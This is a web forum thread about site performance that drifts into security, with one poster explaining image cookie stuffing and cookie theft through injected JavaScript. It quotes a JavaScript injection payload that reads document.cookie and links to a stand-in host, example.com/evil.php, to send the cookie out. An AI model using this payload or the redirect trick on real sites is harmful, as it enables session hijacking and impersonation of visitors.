Thread: Best ways to speed up your site

Originally Posted by dunk3r23

Well, haven't you heard of image cookie stuffing?

More info please

This is going way off topic.

Image cookie stuffing is not performance related ( "Best ways to speed up your site" => no relevance)

Image cookie stuffing is a security hole and the only way you can really prevent it is to not trust other sites as the source of your image

What basically happens is that the user uses the source for their image on their site, and using htaccess (or other redirect methods), they then redirect you to a PHP file that sets a cookie.

They can then set a cookie from their site on yours! (you may also need to fake the referer within that php file)

So for instance I could do this by adding an image to this page from the source on my site, this would then make everyone who visited this page have a certain cookie (for example, everyone who then visited this page on your forum would be automatically logged in as Mike22 and post for me ) - Not a great exploit, there are much better ones than that.

I prefer session cookie theft through images, but this is an exploit if the sites calls an image incorrectly (unsafely), and allows the user to place script in the image link
(I mentioned this on DP a while ago)

If you can find an exploit that allows you to put the link of the image, then you can add a small bit of JavaScript at the end of the image. As an example, this bit of script shows the cookie (and could potentaily send the cookie to me instead of example.com):

Originally Posted by Mike22

javascript: void(document.getElementById('header').innerHTML=' <a onmouseover ="alert(document.cookie);" ><font size="10" COLOR = Red>mouseOverToShowCookie </font><font></a> <a href="javascript:window.location=www.example.com/evil.php?c=%22+document.cookie"> dOnT CLiCk ThiS</a>');

Using FireFox, if you put the above script in the url, press return and then scroll to the top of the page. (dont worry, I haven't hacked OWF) you can see what this does <= using JavaScript in this way is know as JavaScript injection.

This really has nothing to do with image re-sizing or performance!
- If all the images are being added by the webmaster (and not the users) and you are not calling the images incorrectly, these exploits are not relevant, and certainly not relevant to the title of this thread... I don't know how we went off in that direction

[can you use my username when quoting me from privates messages dunk3r23, cheers]

You are right Mike, we are going off topic on this thread (sorry Lol) but you must agree with me that the info related to a security fall on images is an interested topic to discuss too (why not starting a new thread regarding this issue and how to prevent it?), btw as usually thanks for your tips dude.

Now can i know what is image cooking stuffing?Hearing this word for the first time ever.Kindly give me some more details if you can.